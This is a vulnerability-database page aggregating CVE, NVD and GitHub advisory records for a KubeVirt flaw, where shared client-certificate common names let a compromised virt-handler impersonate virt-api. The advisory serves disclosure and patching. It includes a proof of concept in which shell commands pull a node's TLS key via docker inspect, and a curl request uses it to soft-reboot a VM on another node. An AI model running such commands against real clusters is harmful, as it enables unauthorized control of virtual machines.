Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2025-64434 (GCVE-0-2025-64434)
Vulnerability from cvelistv5 – Published: 2025-11-07 22:54 – Updated: 2025-11-10 19:03
VLAI?
EPSS
Title
KubeVirt Improper TLS Certificate Management Handling Allows API Identity Spoofing
Summary
KubeVirt is a virtual machine management add-on for Kubernetes. Prior to 1.5.3 and 1.6.1, due to the peer verification logic in virt-handler (via verifyPeerCert), an attacker who compromises a virt-handler instance, could exploit these shared credentials to impersonate virt-api and execute privileged operations against other virt-handler instances potentially compromising the integrity and availability of the VM managed by it. This vulnerability is fixed in 1.5.3 and 1.6.1.
Severity ?
4.7 (Medium)
CWE
- CWE-287 - Improper Authentication
Assigner
References
| URL | Tags | |||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-64434",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-11-10T19:02:59.922086Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-11-10T19:03:26.345Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "kubevirt",
"vendor": "kubevirt",
"versions": [
{
"status": "affected",
"version": "\u003c 1.5.3"
},
{
"status": "affected",
"version": "\u003e= 1.6.0-alpha.0, \u003c 1.6.1"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "KubeVirt is a virtual machine management add-on for Kubernetes. Prior to 1.5.3 and 1.6.1, due to the peer verification logic in virt-handler (via verifyPeerCert), an attacker who compromises a virt-handler instance, could exploit these shared credentials to impersonate virt-api and execute privileged operations against other virt-handler instances potentially compromising the integrity and availability of the VM managed by it. This vulnerability is fixed in 1.5.3 and 1.6.1."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-287",
"description": "CWE-287: Improper Authentication",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-11-07T22:54:04.772Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-ggp9-c99x-54gp",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-ggp9-c99x-54gp"
},
{
"name": "https://github.com/kubevirt/kubevirt/commit/231dc69723f331dc02f65a31ab4c3d6869f40d6a",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/kubevirt/kubevirt/commit/231dc69723f331dc02f65a31ab4c3d6869f40d6a"
},
{
"name": "https://github.com/kubevirt/kubevirt/commit/af2f08a9a186eccc650f87c30ab3e07b669e8b5b",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/kubevirt/kubevirt/commit/af2f08a9a186eccc650f87c30ab3e07b669e8b5b"
},
{
"name": "https://github.com/kubevirt/kubevirt/commit/b9773bc588e6e18ece896a2dad5336ef7a653074",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/kubevirt/kubevirt/commit/b9773bc588e6e18ece896a2dad5336ef7a653074"
}
],
"source": {
"advisory": "GHSA-ggp9-c99x-54gp",
"discovery": "UNKNOWN"
},
"title": "KubeVirt Improper TLS Certificate Management Handling Allows API Identity Spoofing"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-64434",
"datePublished": "2025-11-07T22:54:04.772Z",
"dateReserved": "2025-11-03T22:12:51.365Z",
"dateUpdated": "2025-11-10T19:03:26.345Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2025-64434\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-11-07T23:15:45.690\",\"lastModified\":\"2025-11-25T17:05:28.493\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"KubeVirt is a virtual machine management add-on for Kubernetes. Prior to 1.5.3 and 1.6.1, due to the peer verification logic in virt-handler (via verifyPeerCert), an attacker who compromises a virt-handler instance, could exploit these shared credentials to impersonate virt-api and execute privileged operations against other virt-handler instances potentially compromising the integrity and availability of the VM managed by it. This vulnerability is fixed in 1.5.3 and 1.6.1.\"},{\"lang\":\"es\",\"value\":\"KubeVirt es un complemento de gesti\u00f3n de m\u00e1quinas virtuales para Kubernetes. Antes de las versiones 1.5.3 y 1.6.1, debido a la l\u00f3gica de verificaci\u00f3n de pares en virt-handler (a trav\u00e9s de verifyPeerCert), un atacante que comprometiese una instancia de virt-handler podr\u00eda explotar estas credenciales compartidas para suplantar a virt-API y ejecutar operaciones privilegiadas contra otras instancias de virt-handler, comprometiendo potencialmente la integridad y disponibilidad de la m\u00e1quina virtual gestionada por esta. Esta vulnerabilidad est\u00e1 corregida en las versiones 1.5.3 y 1.6.1.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H\",\"baseScore\":4.7,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"LOCAL\",\"attackComplexity\":\"HIGH\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":1.0,\"impactScore\":3.6},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H\",\"baseScore\":6.3,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"LOCAL\",\"attackComplexity\":\"HIGH\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":1.0,\"impactScore\":5.2}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-287\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:kubevirt:kubevirt:*:*:*:*:*:kubernetes:*:*\",\"versionEndExcluding\":\"1.5.3\",\"matchCriteriaId\":\"D06A16D0-A19D-4FC9-BBB2-DD155157AD8E\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:kubevirt:kubevirt:1.6.0:*:*:*:*:kubernetes:*:*\",\"matchCriteriaId\":\"78254CFF-E38D-4C0A-AB4B-3F41FCBB2A3C\"}]}]}],\"references\":[{\"url\":\"https://github.com/kubevirt/kubevirt/commit/231dc69723f331dc02f65a31ab4c3d6869f40d6a\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/kubevirt/kubevirt/commit/af2f08a9a186eccc650f87c30ab3e07b669e8b5b\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/kubevirt/kubevirt/commit/b9773bc588e6e18ece896a2dad5336ef7a653074\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/kubevirt/kubevirt/security/advisories/GHSA-ggp9-c99x-54gp\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-64434\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-11-10T19:02:59.922086Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-11-10T19:03:17.018Z\"}}], \"cna\": {\"title\": \"KubeVirt Improper TLS Certificate Management Handling Allows API Identity Spoofing\", \"source\": {\"advisory\": \"GHSA-ggp9-c99x-54gp\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 4.7, \"attackVector\": \"LOCAL\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"HIGH\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"kubevirt\", \"product\": \"kubevirt\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 1.5.3\"}, {\"status\": \"affected\", \"version\": \"\u003e= 1.6.0-alpha.0, \u003c 1.6.1\"}]}], \"references\": [{\"url\": \"https://github.com/kubevirt/kubevirt/security/advisories/GHSA-ggp9-c99x-54gp\", \"name\": \"https://github.com/kubevirt/kubevirt/security/advisories/GHSA-ggp9-c99x-54gp\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/kubevirt/kubevirt/commit/231dc69723f331dc02f65a31ab4c3d6869f40d6a\", \"name\": \"https://github.com/kubevirt/kubevirt/commit/231dc69723f331dc02f65a31ab4c3d6869f40d6a\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/kubevirt/kubevirt/commit/af2f08a9a186eccc650f87c30ab3e07b669e8b5b\", \"name\": \"https://github.com/kubevirt/kubevirt/commit/af2f08a9a186eccc650f87c30ab3e07b669e8b5b\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/kubevirt/kubevirt/commit/b9773bc588e6e18ece896a2dad5336ef7a653074\", \"name\": \"https://github.com/kubevirt/kubevirt/commit/b9773bc588e6e18ece896a2dad5336ef7a653074\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"KubeVirt is a virtual machine management add-on for Kubernetes. Prior to 1.5.3 and 1.6.1, due to the peer verification logic in virt-handler (via verifyPeerCert), an attacker who compromises a virt-handler instance, could exploit these shared credentials to impersonate virt-api and execute privileged operations against other virt-handler instances potentially compromising the integrity and availability of the VM managed by it. This vulnerability is fixed in 1.5.3 and 1.6.1.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-287\", \"description\": \"CWE-287: Improper Authentication\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2025-11-07T22:54:04.772Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2025-64434\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-11-10T19:03:26.345Z\", \"dateReserved\": \"2025-11-03T22:12:51.365Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2025-11-07T22:54:04.772Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
FKIE_CVE-2025-64434
Vulnerability from fkie_nvd - Published: 2025-11-07 23:15 - Updated: 2025-11-25 17:05
Severity ?
4.7 (Medium) - CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H
6.3 (Medium) - CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H
6.3 (Medium) - CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H
Summary
KubeVirt is a virtual machine management add-on for Kubernetes. Prior to 1.5.3 and 1.6.1, due to the peer verification logic in virt-handler (via verifyPeerCert), an attacker who compromises a virt-handler instance, could exploit these shared credentials to impersonate virt-api and execute privileged operations against other virt-handler instances potentially compromising the integrity and availability of the VM managed by it. This vulnerability is fixed in 1.5.3 and 1.6.1.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:kubevirt:kubevirt:*:*:*:*:*:kubernetes:*:*",
"matchCriteriaId": "D06A16D0-A19D-4FC9-BBB2-DD155157AD8E",
"versionEndExcluding": "1.5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:kubevirt:kubevirt:1.6.0:*:*:*:*:kubernetes:*:*",
"matchCriteriaId": "78254CFF-E38D-4C0A-AB4B-3F41FCBB2A3C",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "KubeVirt is a virtual machine management add-on for Kubernetes. Prior to 1.5.3 and 1.6.1, due to the peer verification logic in virt-handler (via verifyPeerCert), an attacker who compromises a virt-handler instance, could exploit these shared credentials to impersonate virt-api and execute privileged operations against other virt-handler instances potentially compromising the integrity and availability of the VM managed by it. This vulnerability is fixed in 1.5.3 and 1.6.1."
},
{
"lang": "es",
"value": "KubeVirt es un complemento de gesti\u00f3n de m\u00e1quinas virtuales para Kubernetes. Antes de las versiones 1.5.3 y 1.6.1, debido a la l\u00f3gica de verificaci\u00f3n de pares en virt-handler (a trav\u00e9s de verifyPeerCert), un atacante que comprometiese una instancia de virt-handler podr\u00eda explotar estas credenciales compartidas para suplantar a virt-API y ejecutar operaciones privilegiadas contra otras instancias de virt-handler, comprometiendo potencialmente la integridad y disponibilidad de la m\u00e1quina virtual gestionada por esta. Esta vulnerabilidad est\u00e1 corregida en las versiones 1.5.3 y 1.6.1."
}
],
"id": "CVE-2025-64434",
"lastModified": "2025-11-25T17:05:28.493",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.0,
"impactScore": 3.6,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.0,
"impactScore": 5.2,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2025-11-07T23:15:45.690",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/kubevirt/kubevirt/commit/231dc69723f331dc02f65a31ab4c3d6869f40d6a"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/kubevirt/kubevirt/commit/af2f08a9a186eccc650f87c30ab3e07b669e8b5b"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/kubevirt/kubevirt/commit/b9773bc588e6e18ece896a2dad5336ef7a653074"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-ggp9-c99x-54gp"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-287"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
GHSA-GGP9-C99X-54GP
Vulnerability from github – Published: 2025-11-06 23:35 – Updated: 2025-11-27 08:48
VLAI?
Summary
KubeVirt's Improper TLS Certificate Management Handling Allows API Identity Spoofing
Details
Summary
Due to improper TLS certificate management, a compromised virt-handler could impersonate virt-api by using its own TLS credentials, allowing it to initiate privileged operations against another virt-handler.
Details
Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer.
Because of improper TLS certificate management, a compromised virt-handler instance can reuse its TLS bundle to impersonate virt-api, enabling unauthorized access to VM lifecycle operations on other virt-handler nodes.
The virt-api component acts as a sub-resource server, and it proxies API VM lifecycle requests to virt-handler instances.
The communication between virt-api and virt-handler instances is secured using mTLS. The former acts as a client while the latter as the server. The client certificate used by virt-api is defined in the source code as follows and have the following properties:
//pkg/virt-api/api.go
const (
...
defaultCAConfigMapName = "kubevirt-ca"
...
defaultHandlerCertFilePath = "/etc/virt-handler/clientcertificates/tls.crt"
defaultHandlerKeyFilePath = "/etc/virt-handler/clientcertificates/tls.key"
)
# verify virt-api's certificate properties from the docker container in which it is deployed using Minikube
admin@minikube:~$ openssl x509 -text -in \
$(CID=$(docker ps --filter 'Name=virt-api' --format '{{.ID}}' | head -n 1) && \
docker inspect $CID | grep "clientcertificates:ro" | cut -d ":" -f1 | \
tr -d '"[:space:]')/tls.crt | \
grep -e "Subject:" -e "Issuer:" -e "Serial"
Serial Number: 127940157512425330 (0x1c688e539091f72)
Issuer: CN = kubevirt.io@1747579138
Subject: CN = kubevirt.io:system:client:virt-handler
The virt-handler component verifies the signature of client certificates using a self-signed root CA. This latter is generated by virt-operator when the KubeVirt stack is deployed and it is stored within a ConfigMap in the kubevirt namespace. This configmap is used as a trust anchor by all virt-handler instances to verify client certificates.
# inspect the self-signed root CA used to sign virt-api and virt-handler's certificates
admin@minikube:~$ kubectl -n kubevirt get configmap kubevirt-ca -o jsonpath='{.data.ca-bundle}' | openssl x509 -text | grep -e "Subject:" -e "Issuer:" -e "Serial"
Serial Number: 319368675363923930 (0x46ea01e3f7427da)
Issuer: CN=kubevirt.io@1747579138
Subject: CN=kubevirt.io@1747579138
The kubevirt-ca is also used to sign the server certificate which is used by a virt-handler instance:
admin@minikube:~$ openssl x509 -text -in \
$(CID=$(docker ps --filter 'Name=virt-handler' --format '{{.ID}}' | head -n 1) && \
docker inspect $CID | grep "servercertificates:ro" | cut -d ":" -f1 | \
tr -d '"[:space:]')/tls.crt | \
grep -e "Subject:" -e "Issuer:" -e "Serial"
# the virt-handler's server ceriticate is issued by the same root CA
Serial Number: 7584450293644921758 (0x6941615ba1500b9e)
Issuer: CN = kubevirt.io@1747579138
Subject: CN = kubevirt.io:system:node:virt-handler
In addition to the validity of the signature, the virt-handler component also verifies the CN field of the presented certificate:
//pkg/util/tls/tls.go
func SetupTLSForVirtHandlerServer(caManager ClientCAManager, certManager certificate.Manager, externallyManaged bool, clusterConfig *virtconfig.ClusterConfig) *tls.Config {
// #nosec cause: InsecureSkipVerify: true
// resolution: Neither the client nor the server should validate anything itself, `VerifyPeerCertificate` is still executed
//...
// XXX: We need to verify the cert ourselves because we don't have DNS or IP on the certs at the moment
VerifyPeerCertificate: func(rawCerts [][]byte, verifiedChains [][]*x509.Certificate) error {
return verifyPeerCert(rawCerts, externallyManaged, certPool, x509.ExtKeyUsageClientAuth, "client")
},
//...
}
func verifyPeerCert(rawCerts [][]byte, externallyManaged bool, certPool *x509.CertPool, usage x509.ExtKeyUsage, commonName string) error {
//...
rawPeer, rawIntermediates := rawCerts[0], rawCerts[1:]
c, err := x509.ParseCertificate(rawPeer)
//...
fullCommonName := fmt.Sprintf("kubevirt.io:system:%s:virt-handler", commonName)
if !externallyManaged && c.Subject.CommonName != fullCommonName {
return fmt.Errorf("common name is invalid, expected %s, but got %s", fullCommonName, c.Subject.CommonName)
}
//...
The above code illustrates that client certificates accepted be KubeVirt should have as CN kubevirt.io:system:client:virt-handler which is the same as the CN present in the virt-api's certificate. However, the latter is not the only component in the KubeVirt stack which can communicate with a virt-handler instance.
In addition to the extension API server, any other virt-handler can communicate with it. This happens in the context of VM migration operations. When a VM is migrated from one node to another, the virt-handlers on both nodes are going to use structures called ProxyManager to communicate back and forth on the state of the migration.
//pkg/virt-handler/migration-proxy/migration-proxy.go
func NewMigrationProxyManager(serverTLSConfig *tls.Config, clientTLSConfig *tls.Config, config *virtconfig.ClusterConfig) ProxyManager {
return &migrationProxyManager{
sourceProxies: make(map[string][]*migrationProxy),
targetProxies: make(map[string][]*migrationProxy),
serverTLSConfig: serverTLSConfig,
clientTLSConfig: clientTLSConfig,
config: config,
}
}
This communication follows a classical client-server model, where the virt-handler on the migration source node acts as a client and the virt-handler on the migration destination node acts as a server. This communication is also secured using mTLS. The server certificate presented by the virt-handler acting as a migration destination node is the same as the one which is used for the communication between the same virt-handler and the virt-api in the context of VM lifecycle operations (CN=kubevirt.io:system:node:virt-handler). However, the client certificate which is used by a virt-handler instance has the same CN as the client certificate used by virt-api.
admin@minikube:~$ openssl x509 -text -in $(CID=$(docker ps --filter 'Name=virt-handler' --format '{{.ID}}' | head -n 1) && docker inspect $CID | grep "clientcertificates:ro" | cut -d ":" -f1 | tr -d '"[:space:]')/tls.crt | grep -e "Subject:" -e "Issuer:" -e "Serial"
Serial Number: 2951695854686290384 (0x28f687bdb791c1d0)
Issuer: CN = kubevirt.io@1747579138
Subject: CN = kubevirt.io:system:client:virt-handler
Although the migration procedure, where two separate virt-handler instances coordinate the transfer of a VM's state, is not directly tied to the communication between virt-api and virt-handler during VM lifecycle management, there is a critical overlap in the TLS authentication mechanism. Specifically, the client certificate used by both virt-handler and virt-api shares the same CN field, despite the use of different, randomly allocated ports, for the two types of communication.
PoC
Complete instructions, including specific configuration details, to reproduce the vulnerability.
To illustrate the vulnerability, a Minikube cluster has been deployed with two nodes (minikube and minikube-m02) thus, with two virt-handler instances alongside a vmi running on one of the nodes. It is considered that an attacker has obtained access to the client certificate bundle used by the virt-handler instance running on the compromised node (minikube) while the virtual machine is running on the other node (minikube-m02). Thus, they can interact with the sub-resource API exposed by the other virt-handler instance and control the lifecycle of the VMs running on the other node:
# the deployed VMI on the non-compromised node minikube-m02
apiVersion: kubevirt.io/v1
kind: VirtualMachineInstance
metadata:
labels:
kubevirt.io/size: small
name: mishandling-common-name-in-certificate-handler
spec:
domain:
devices:
disks:
- name: containerdisk
disk:
bus: virtio
- name: cloudinitdisk
disk:
bus: virtio
resources:
requests:
memory: 1024M
terminationGracePeriodSeconds: 0
volumes:
- name: containerdisk
containerDisk:
image: quay.io/kubevirt/cirros-container-disk-demo
- name: cloudinitdisk
cloudInitNoCloud:
userDataBase64: SGkuXG4=
# the IP of the non-compromised handler running on the node minikube-m02 is 10.244.1.3
attacker@minikube:~$ curl -k https://10.244.1.3:8186/
curl: (56) OpenSSL SSL_read: error:0A00045C:SSL routines::tlsv13 alert certificate required, errno 0
# get the certificate bundle directory and redo the request
attacker@minikube:~$ export CERT_DIR=$(docker inspect $(docker ps --filter 'Name=virt-handler' --format='{{.ID}}' | head -n 1) | grep "clientcertificates:ro" | cut -d ':' -f1 | tr -d '"[:space:]')
attacker@minikube:~$ curl -k --cert ${CERT_DIR}/tls.crt --key ${CERT_DIR}/tls.key https://10.244.1.3:8186/
404: Page Not Found
# soft reboot the VMI instance running on the other node
attacker@minikube:~$ curl -ki --cert ${CERT_DIR}/tls.crt --key ${CERT_DIR}/tls.key https://10.244.1.3:8186/v1/namespaces/default/virtualmachineinstances/mishandling-common-name-in-certificate-handler/softreboot -XPUT
HTTP/1.1 202 Accepted
# the VMI mishandling-common-name-in-certificate-handler has been rebooted
Impact
What kind of vulnerability is it? Who is impacted?
Due to the peer verification logic in virt-handler (via verifyPeerCert), an attacker who compromises a virt-handler instance, could exploit these shared credentials to impersonate virt-api and execute privileged operations against other virt-handler instances potentially compromising the integrity and availability of the managed by it VM.
Severity ?
4.7 (Medium)
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "kubevirt.io/kubevirt"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.5.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "kubevirt.io/kubevirt"
},
"ranges": [
{
"events": [
{
"introduced": "1.6.0-alpha.0"
},
{
"fixed": "1.6.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-64434"
],
"database_specific": {
"cwe_ids": [
"CWE-287"
],
"github_reviewed": true,
"github_reviewed_at": "2025-11-06T23:35:03Z",
"nvd_published_at": "2025-11-07T23:15:45Z",
"severity": "MODERATE"
},
"details": "### Summary\nDue to improper TLS certificate management, a compromised `virt-handler` could impersonate `virt-api` by using its own TLS credentials, allowing it to initiate privileged operations against another `virt-handler`.\n\n### Details\n_Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer._\n\nBecause of improper TLS certificate management, a compromised `virt-handler` instance can reuse its TLS bundle to impersonate `virt-api`, enabling unauthorized access to VM lifecycle operations on other `virt-handler` nodes. \nThe `virt-api` component acts as a sub-resource server, and it proxies API VM lifecycle requests to `virt-handler` instances.\nThe communication between `virt-api` and `virt-handler` instances is secured using mTLS. The former acts as a client while the latter as the server. The client certificate used by `virt-api` is defined in the source code as follows and have the following properties: \n\n```go\n//pkg/virt-api/api.go\n\nconst (\n\t...\n\tdefaultCAConfigMapName = \"kubevirt-ca\"\n ...\n\tdefaultHandlerCertFilePath = \"/etc/virt-handler/clientcertificates/tls.crt\"\n\tdefaultHandlerKeyFilePath = \"/etc/virt-handler/clientcertificates/tls.key\"\n)\n```\n\n```bash\n# verify virt-api\u0027s certificate properties from the docker container in which it is deployed using Minikube\nadmin@minikube:~$ openssl x509 -text -in \\ \n$(CID=$(docker ps --filter \u0027Name=virt-api\u0027 --format \u0027{{.ID}}\u0027 | head -n 1) \u0026\u0026 \\\ndocker inspect $CID | grep \"clientcertificates:ro\" | cut -d \":\" -f1 | \\\ntr -d \u0027\"[:space:]\u0027)/tls.crt | \\\ngrep -e \"Subject:\" -e \"Issuer:\" -e \"Serial\"\n\nSerial Number: 127940157512425330 (0x1c688e539091f72)\nIssuer: CN = kubevirt.io@1747579138\nSubject: CN = kubevirt.io:system:client:virt-handler\n```\n\nThe `virt-handler` component verifies the signature of client certificates using a self-signed root CA. This latter is generated by `virt-operator` when the KubeVirt stack is deployed and it is stored within a ConfigMap in the `kubevirt` namespace. **This configmap is used as a trust anchor** by all `virt-handler` instances to verify client certificates.\n\n```bash\n# inspect the self-signed root CA used to sign virt-api and virt-handler\u0027s certificates\nadmin@minikube:~$ kubectl -n kubevirt get configmap kubevirt-ca -o jsonpath=\u0027{.data.ca-bundle}\u0027 | openssl x509 -text | grep -e \"Subject:\" -e \"Issuer:\" -e \"Serial\"\n\nSerial Number: 319368675363923930 (0x46ea01e3f7427da)\nIssuer: CN=kubevirt.io@1747579138\nSubject: CN=kubevirt.io@1747579138\n```\n\nThe `kubevirt-ca` is also used to sign the server certificate which is used by a `virt-handler` instance:\n\n\n```bash\nadmin@minikube:~$ openssl x509 -text -in \\ \n$(CID=$(docker ps --filter \u0027Name=virt-handler\u0027 --format \u0027{{.ID}}\u0027 | head -n 1) \u0026\u0026 \\\ndocker inspect $CID | grep \"servercertificates:ro\" | cut -d \":\" -f1 | \\\ntr -d \u0027\"[:space:]\u0027)/tls.crt | \\\ngrep -e \"Subject:\" -e \"Issuer:\" -e \"Serial\"\n\n# the virt-handler\u0027s server ceriticate is issued by the same root CA\nSerial Number: 7584450293644921758 (0x6941615ba1500b9e)\nIssuer: CN = kubevirt.io@1747579138\nSubject: CN = kubevirt.io:system:node:virt-handler\n```\n\n\nIn addition to the validity of the signature, the `virt-handler` component also verifies the CN field of the presented certificate:\n\n\u003ccode.sec.SetupTLSForVirtHandlerServer\u003e\n```go \n//pkg/util/tls/tls.go\n\nfunc SetupTLSForVirtHandlerServer(caManager ClientCAManager, certManager certificate.Manager, externallyManaged bool, clusterConfig *virtconfig.ClusterConfig) *tls.Config {\n\t// #nosec cause: InsecureSkipVerify: true\n\t// resolution: Neither the client nor the server should validate anything itself, `VerifyPeerCertificate` is still executed\n\t\n\t//...\n\t\t\t\t// XXX: We need to verify the cert ourselves because we don\u0027t have DNS or IP on the certs at the moment\n\t\t\t\tVerifyPeerCertificate: func(rawCerts [][]byte, verifiedChains [][]*x509.Certificate) error {\n\t\t\t\t\treturn verifyPeerCert(rawCerts, externallyManaged, certPool, x509.ExtKeyUsageClientAuth, \"client\")\n\t\t\t\t},\n\t\t\t\t//...\n}\n\nfunc verifyPeerCert(rawCerts [][]byte, externallyManaged bool, 